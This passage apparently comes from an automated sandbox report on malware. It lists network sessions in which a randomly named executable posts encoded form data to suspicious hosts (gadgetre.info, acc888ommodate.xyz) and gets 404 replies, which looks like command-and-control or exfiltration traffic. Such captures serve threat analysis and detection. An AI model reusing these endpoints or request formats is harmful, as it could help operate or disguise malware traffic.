                                                                                Data Raw: 50 4c 70 44 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 34 51 4a 44 7a 36 56 45 6a 65 51 6b 72 66 46 77 6e 4b 68 78 59 34 57 35 6c 38 42 6d 79 42 4f 4f 35 46 33 31 4d 34 4d 4d 4e 71 4a 53 37 6d 57 47 34 74 45 6f 45 36 45 71 76 32 68 4f 41 48 69 52 69 62 52 66 5a 4e 6c 76 6b 71 53 70 56 6b 34 50 58 5a 67 44 74 36 4d 68 42 6d 4d 45 49 32 4b 4a 6e 39 45 54 44 72 7a 56 5a 73 48 62 47 75 43 57 4a 45 6b 34 74 37 50 79 6a 34 76 75 70 78 5a 59 31 6d 4c 4e 62 4d 74 46 64 2b 4e 51 51 2b 66 44 30 78 43 44 6a 61 6e 58 5a 30 34 64 52 51 55 5a 4c 70 62 74 65 32 4b 6e 62 70 6d 45 43 6f 59 6e 43 78 68 71 53 4b 71 43 4f 53 6d 74 4c 47 6a 58 63 68 67 5a 37 62 42 49 54 46 56 37 45 4f 44
                                                                                Data Ascii: PLpD=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyBOO5F31M4MMNqJS7mWG4tEoE6Eqv2hOAHiRibRfZNlvkqSpVk4PXZgDt6MhBmMEI2KJn9ETDrzVZsHbGuCWJEk4t7Pyj4vupxZY1mLNbMtFd+NQQ+fD0xCDjanXZ04dRQUZLpbte2KnbpmECoYnCxhqSKqCOSmtLGjXchgZ7bBITFV7EOD
                                                                                Dec 3, 2024 14:15:21.465904951 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:21 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.549952209.74.77.107803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:22.890433073 CET1815OUTPOST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 34 51 4a 44 7a 36 56 45 6a 65 51 6b 72 66 46 77 6e 4b 68 78 59 34 57 35 6c 38 42 6d 79 5a 4f 4f 4b 64 33 7a 64 34 4d 4e 4e 71 4a 4f 4c 6d 58 47 34 74 46 6f 45 69 41 71 76 79 78 4f 45 33 69 51 48 48 52 5a 74 68 6c 68 6b 71 53 6d 31 6b 39 42 33 5a 50 44 73 57 41 68 42 32 4d 45 49 32 4b 4a 6c 31 45 55 58 33 7a 58 5a 73 49 59 47 75 65 53 4a 46 44 34 74 6a 35 79 6a 38 2f 75 61 35 5a 59 56 32 4c 4d 6f 6b 74 4e 64 2b 50 54 51 2b 39 44 30 38 43 44 6a 48 55 58 5a 41 65 64 57 63 55 4a 76 73 67 39 4e 4b 4a 2b 6f 4a 32 48 43 5a 35 6c 48 5a 54 72 42 4f 6a 65 76 75 43 6c 6f 75 6a 42 4d 4a 39 54 61 79 34 55 6e 5a 32 79 77 6e 72 58 63 42 48 30 63 57 36 69 78 38 7a 4a 31 70 6d 43 62 7a 4b 32 41 76 6b 38 79 2f 66 37 42 72 56 46 6e 51 57 37 56 77 36 61 76 7a 63 34 65 65 30 6a 32 39 78 76 63 76 46 39 2b 69 45 32 4b 2f 76 69 6e 42 38 50 69 65 47 48 66 65 48 7a 35 73 42 64 41 36 68 62 49 48 75 48 45 48 33 70 62 6c 71 5a 67 76 69 49 4f 30 39 30 37 57 30 44 6f 57 51 41 [TRUNCATED]
                                                                                Data Ascii: PLpD=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyZOOKd3zd4MNNqJOLmXG4tFoEiAqvyxOE3iQHHRZthlhkqSm1k9B3ZPDsWAhB2MEI2KJl1EUX3zXZsIYGueSJFD4tj5yj8/ua5ZYV2LMoktNd+PTQ+9D08CDjHUXZAedWcUJvsg9NKJ+oJ2HCZ5lHZTrBOjevuCloujBMJ9Tay4UnZ2ywnrXcBH0cW6ix8zJ1pmCbzK2Avk8y/f7BrVFnQW7Vw6avzc4ee0j29xvcvF9+iE2K/vinB8PieGHfeHz5sBdA6hbIHuHEH3pblqZgviIO0907W0DoWQAOUI86nisVEh6O+RyJIZKdYZ65jK9rYa782zKakixRp+x6/X0/a0LKGU6TkAc4U+tJ4tXNJY5PSqIUZSgNdZFNd4DPpYq+ORQI52Hp8SU4wr3G8nEWb1oKJPiLO17kCTBralKWPZ1fhd3tR6amP3qvHZwdUeVf7AKgGb4/SjZvUQWAbkrzK598iuilDYjk0rbxqUgEh2qiRhMG/ZDBdBEAqn2uhBe+KPNcGe+BXaCUbhjsCni2EDX/isI3OoMIt7EuLrb44/M20h5cQPUQwGwg5x7mrLDVhEB66fIRAxkIb8ORxN8KyJIMfVUxWjchT0/NAwbG1GfNqf6LE9XnyV35c1rieFh0cgG0ROiPPgZ5p0qQoFLn4+pGXyg7dz/fsZ/Pa9ij76ggsK77RMpkROrPQpJooMHzuTP2YtbfXmQzH90LlgtRZkyOBXfWn+PY0WI3kZ1vNeKS4gFfcSdadHmzy+Qr1vDPYcbWWy82iXDh/Fw/ywoJBzzE++hBaQnjGVQ3MivoK6307EktZ7C1TnwrB1n9hJTsQQ/Q1j/dEauM18dISwC57yFnP+zWXIt0H88/8tbwUtmMUeMcrdZo8mUv7WsgHAAUi0vswNyEwvPH69lS4bHUIkclMsuNwi0QU6RLmeWdvE5YWDb4L86go8c+hfwRTgH05qYc9 [TRUNCATED]
                                                                                Dec 3, 2024 14:15:23.148901939 CET1236OUTData Raw: 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 34 51 4a 44 7a 36 56 45 6a 65 51 6b 72 66 46 77 6e 4b 68 78 59 34 57 35 6c 38 42 6d 79 5a 4f 4f 4b 64 33 7a 64 34 4d 4e 4e 71 4a 4f 4c 6d 58 47 34 74 46 6f 45 69 41 71 76 79 78 4f 45 33 69 51 48 48 52 5a 74
                                                                                Data Ascii: lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyZOOKd3zd4MNNqJOLmXG4tFoEiAqvyxOE3iQHHRZthlhkqSm1k9B3ZPDsWAhB2MEI2KJl1EUX3zXZsIYGueSJFD4tj5yj8/ua5ZYV2LMoktNd+PTQ+9D08CDjHUXZAedWcUJvsg9NKJ+oJ2HCZ5lHZTrBOjevuCloujBMJ9Tay4UnZ2ywnrXcBH0cW6ix8zJ1pmCbzK2Av
                                                                                Dec 3, 2024 14:15:23.523921013 CET1236OUTPOST /8q8w/ HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.gadgetre.info
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 6c 4e 4f 2f 77 31 36 55 6f 37 32 75 4a 34 51 4a 44 7a 36 56 45 6a 65 51 6b 72 66 46 77 6e 4b 68 78 59 34 57 35 6c 38 42 6d 79 5a 4f 4f 4b 64 33 7a 64 34 4d 4e 4e 71 4a 4f 4c 6d 58 47 34 74 46 6f 45 69 41 71 76 79 78 4f 45 33 69 51 48 48 52 5a 74 68 6c 68 6b 71 53 6d 31 6b 39 42 33 5a 50 44 73 57 41 68 42 32 4d 45 49 32 4b 4a 6c 31 45 55 58 33 7a 58 5a 73 49 59 47 75 65 53 4a 46 44 34 74 6a 35 79 6a 38 2f 75 61 35 5a 59 56 32 4c 4d 6f 6b 74 4e 64 2b 50 54 51 2b 39 44 30 38 43 44 6a 48 55 58 5a 41 65 64 57 63 55 4a 76 73 67 39 4e 4b 4a 2b 6f 4a 32 48 43 5a 35 6c 48 5a 54 72 42 4f 6a 65 76 75 43 6c 6f 75 6a 42 4d 4a 39 54 61 79 34 55 6e 5a 32 79 77 6e 72 58 63 42 48 30 63 57 36 69 78 38 7a 4a 31 70 6d 43 62 7a 4b 32 41 76 6b 38 79 2f 66 37 42 72 56 46 6e 51 57 37 56 77 36 61 76 7a 63 34 65 65 30 6a 32 39 78 76 63 76 46 39 2b 69 45 32 4b 2f 76 69 6e 42 38 50 69 65 47 48 66 65 48 7a 35 73 42 64 41 36 68 62 49 48 75 48 45 48 33 70 62 6c 71 5a 67 76 69 49 4f 30 39 30 37 57 30 44 6f 57 51 41 [TRUNCATED]
                                                                                Data Ascii: PLpD=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyZOOKd3zd4MNNqJOLmXG4tFoEiAqvyxOE3iQHHRZthlhkqSm1k9B3ZPDsWAhB2MEI2KJl1EUX3zXZsIYGueSJFD4tj5yj8/ua5ZYV2LMoktNd+PTQ+9D08CDjHUXZAedWcUJvsg9NKJ+oJ2HCZ5lHZTrBOjevuCloujBMJ9Tay4UnZ2ywnrXcBH0cW6ix8zJ1pmCbzK2Avk8y/f7BrVFnQW7Vw6avzc4ee0j29xvcvF9+iE2K/vinB8PieGHfeHz5sBdA6hbIHuHEH3pblqZgviIO0907W0DoWQAOUI86nisVEh6O+RyJIZKdYZ65jK9rYa782zKakixRp+x6/X0/a0LKGU6TkAc4U+tJ4tXNJY5PSqIUZSgNdZFNd4DPpYq+ORQI52Hp8SU4wr3G8nEWb1oKJPiLO17kCTBralKWPZ1fhd3tR6amP3qvHZwdUeVf7AKgGb4/SjZvUQWAbkrzK598iuilDYjk0rbxqUgEh2qiRhMG/ZDBdBEAqn2uhBe+KPNcGe+BXaCUbhjsCni2EDX/isI3OoMIt7EuLrb44/M20h5cQPUQwGwg5x7mrLDVhEB66fIRAxkIb8ORxN8KyJIMfVUxWjchT0/NAwb
                                                                                Dec 3, 2024 14:15:23.844048977 CET579OUTData Raw: 47 31 47 66 4e 71 66 36 4c 45 39 58 6e 79 56 33 35 63 31 72 69 65 46 68 30 63 67 47 30 52 4f 69 50 50 67 5a 35 70 30 71 51 6f 46 4c 6e 34 2b 70 47 58 79 67 37 64 7a 2f 66 73 5a 2f 50 61 39 69 6a 37 36 67 67 73 4b 37 37 52 4d 70 6b 52 4f 72 50 51
                                                                                Data Ascii: G1GfNqf6LE9XnyV35c1rieFh0cgG0ROiPPgZ5p0qQoFLn4+pGXyg7dz/fsZ/Pa9ij76ggsK77RMpkROrPQpJooMHzuTP2YtbfXmQzH90LlgtRZkyOBXfWn+PY0WI3kZ1vNeKS4gFfcSdadHmzy+Qr1vDPYcbWWy82iXDh/Fw/ywoJBzzE++hBaQnjGVQ3MivoK6307EktZ7C1TnwrB1n9hJTsQQ/Q1j/dEauM18dISwC57yFnP+


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.549958209.74.77.107803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:25.548809052 CET521OUTGET /8q8w/?PLpD=oPmfzDvAiIeWP+dhDQf7HSaIzNrTwSyGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8okB+i6TciPkxAVomi9Bq2BL+qGFtNXm3IZasYXFTCdN4piQ==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.gadgetre.info
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:15:26.767414093 CET548INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:15:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.549974176.32.38.130803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:32.334563971 CET793OUTPOST /j1io/ HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 4c 34 41 54 31 67 4d 56 77 4b 73 32 71 43 4a 36 33 46 54 54 58 49 73 71 30 55 56 67 78 77 77 65 31 47 37 55 79 4b 76 7a 74 6a 58 63 73 6a 38 47 4f 46 31 62 73 50 56 44 6e 4e 65 64 7a 4b 4d 79 2b 36 47 54 44 6c 31 65 61 48 73 75 58 69 55 4e 31 6c 6a 6a 62 31 53 4a 73 2b 4f 58 4e 54 69 41 44 62 35 51 54 6e 4c 34 2b 58 55 61 61 4c 53 4c 76 49 67 41 4b 41 65 6a 46 74 68 68 6b 6c 76 55 34 72 48 52 53 4e 37 6b 44 4b 75 6f 38 4e 4a 43 41 46 53 7a 6f 61 70 69 6f 70 77 76 47 73 4c 47 53 50 72 49 4a 35 77 4f 64 37 34 68 49 62 45 75 4f 71 36 41 78 74 6d 75 57 70 73 32 7a 58 70 6f 41 4d 32 41 72 48 73 3d
                                                                                Data Ascii: PLpD=L4AT1gMVwKs2qCJ63FTTXIsq0UVgxwwe1G7UyKvztjXcsj8GOF1bsPVDnNedzKMy+6GTDl1eaHsuXiUN1ljjb1SJs+OXNTiADb5QTnL4+XUaaLSLvIgAKAejFthhklvU4rHRSN7kDKuo8NJCAFSzoapiopwvGsLGSPrIJ5wOd74hIbEuOq6AxtmuWps2zXpoAM2ArHs=
                                                                                Dec 3, 2024 14:15:33.635622978 CET289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.549980176.32.38.130803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:34.991055012 CET813OUTPOST /j1io/ HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 4c 34 41 54 31 67 4d 56 77 4b 73 32 34 79 35 36 6b 30 54 54 53 6f 73 70 33 55 56 67 37 51 77 53 31 47 6e 55 79 50 50 6a 74 52 44 63 73 48 34 47 49 30 31 62 76 50 56 44 7a 39 65 59 39 71 4d 39 2b 36 4b 68 44 6e 68 65 61 48 6f 75 58 6e 6f 4e 31 79 66 67 42 46 53 4c 6b 65 4f 4a 4a 54 69 41 44 62 35 51 54 6e 66 53 2b 52 38 61 61 2f 75 4c 74 70 67 48 57 77 65 73 47 74 68 68 76 46 76 51 34 72 48 6e 53 50 50 43 44 4d 71 6f 38 4d 35 43 44 55 53 73 78 71 70 34 73 70 78 36 47 75 32 56 55 66 7a 53 43 36 70 62 63 71 78 65 41 4e 31 45 55 49 79 6f 69 4e 4b 57 47 36 6b 42 69 6e 49 42 61 76 6d 77 31 51 35 6c 79 79 78 6d 32 63 64 36 37 44 4d 32 61 48 6a 38 70 65 5a 37
                                                                                Data Ascii: PLpD=L4AT1gMVwKs24y56k0TTSosp3UVg7QwS1GnUyPPjtRDcsH4GI01bvPVDz9eY9qM9+6KhDnheaHouXnoN1yfgBFSLkeOJJTiADb5QTnfS+R8aa/uLtpgHWwesGthhvFvQ4rHnSPPCDMqo8M5CDUSsxqp4spx6Gu2VUfzSC6pbcqxeAN1EUIyoiNKWG6kBinIBavmw1Q5lyyxm2cd67DM2aHj8peZ7
                                                                                Dec 3, 2024 14:15:36.346638918 CET289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:36 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.549987176.32.38.130803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:15:37.649564028 CET1830OUTPOST /j1io/ HTTP/1.1
                                                                                Host: www.acc888ommodate.xyz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 4c 34 41 54 31 67 4d 56 77 4b 73 32 34 79 35 36 6b 30 54 54 53 6f 73 70 33 55 56 67 37 51 77 53 31 47 6e 55 79 50 50 6a 74 52 62 63 73 30 77 47 4c 58 74 62 75 50 56 44 76 74 65 5a 39 71 4d 61 2b 36 69 6c 44 6e 64 6b 61 46 67 75 52 79 6b 4e 67 32 4c 67 55 56 53 4c 6f 2b 4f 49 4e 54 69 56 44 62 70 55 54 6e 50 53 2b 52 38 61 61 2b 2b 4c 37 6f 67 48 55 77 65 6a 46 74 68 39 6b 6c 75 50 34 72 66 5a 53 50 4c 4e 41 38 4b 6f 39 73 70 43 51 57 36 73 35 71 70 2b 72 70 77 35 47 75 37 4e 55 66 66 65 43 35 30 54 63 74 31 65 52 73 56 59 45 62 66 72 31 4d 69 69 4e 4c 30 41 38 44 45 47 53 4d 32 6a 36 78 4e 32 76 6d 35 58 6a 59 31 42 74 69 46 53 43 6a 79 72 69 4f 77 48 4f 64 44 4b 56 68 6a 50 44 66 75 63 59 4f 44 6f 6f 57 34 70 7a 36 52 78 2b 53 5a 2f 30 64 61 58 6a 6c 74 42 35 77 42 31 56 64 58 63 75 75 4c 32 63 53 7a 64 6e 6d 45 56 5a 33 74 71 4f 41 35 6f 39 48 6c 56 6d 6f 6c 76 42 6e 34 34 49 79 55 54 54 30 44 61 76 74 7a 39 48 6c 75 2f 54 2b 73 66 4d 44 75 63 30 57 67 59 6f 34 4e 33 42 6c 4c 6b 35 [TRUNCATED]
                                                                                Data Ascii: PLpD=L4AT1gMVwKs24y56k0TTSosp3UVg7QwS1GnUyPPjtRbcs0wGLXtbuPVDvteZ9qMa+6ilDndkaFguRykNg2LgUVSLo+OINTiVDbpUTnPS+R8aa++L7ogHUwejFth9kluP4rfZSPLNA8Ko9spCQW6s5qp+rpw5Gu7NUffeC50Tct1eRsVYEbfr1MiiNL0A8DEGSM2j6xN2vm5XjY1BtiFSCjyriOwHOdDKVhjPDfucYODooW4pz6Rx+SZ/0daXjltB5wB1VdXcuuL2cSzdnmEVZ3tqOA5o9HlVmolvBn44IyUTT0Davtz9Hlu/T+sfMDuc0WgYo4N3BlLk5NVXV0O70BJ+Tm+TSScXI7pM/fgkp4I+DIvOM/jLSRLTBau1EdPFLCqswKjAK09w8k8tmEOnO+bSeVRdHbDVNL0sX1nVBJKIB9lyXWS6wB2xIDlE8C0wBUWsT4KmQQtd3NO6N1Et5wy+GZscBqxj4Jr2J52Aj5Gi8lVSNR5TwjYUE6Y+/tON9vf6F+VA4T/0S434iIyqQrnYz67iqr2V+fbSdEvoE/N3VQm0ZXWRqN5HYA0BFNiXTlibswLz2wd60kznAUWXfpBQlp9PgER0KHfSBtT3LOfEcO3Y5I9da4/1XoVP21atQI+fPyptktiip9H4Oro4FAxn945yFAbZFbvI+R5dTItX3j6jfKwb7jJNI6yD7iSz1k9qzSoPeO+ExQ939zD2nxt8jvdghAOArYNMd7tgGDpHIiXqJbXe96Z0Dt3dbqmKdgqr2P+2yfbEt9FdpOOs1Pq4hcgwgKWDEOEcjhAcvp5Xx1ol47odvT449ZkDGlh92FGyiWlbIsGHzuyexAzGRROf4llg6Z3bjNnD/IQ9tWimHpYmAqDFbbrnp0Aq84yRHWRp7mXZEAYRt1nzavFqN25EJXB6jY8ZhkX8A6be2B3qVebnEUwgbfNdJ2a6LASnekD7QDWwBOnnCR1K90HzC8uSJicWx84Clbj0gC8J+sJ7Jsr [TRUNCATED]
                                                                                Dec 3, 2024 14:15:39.006740093 CET289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:15:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
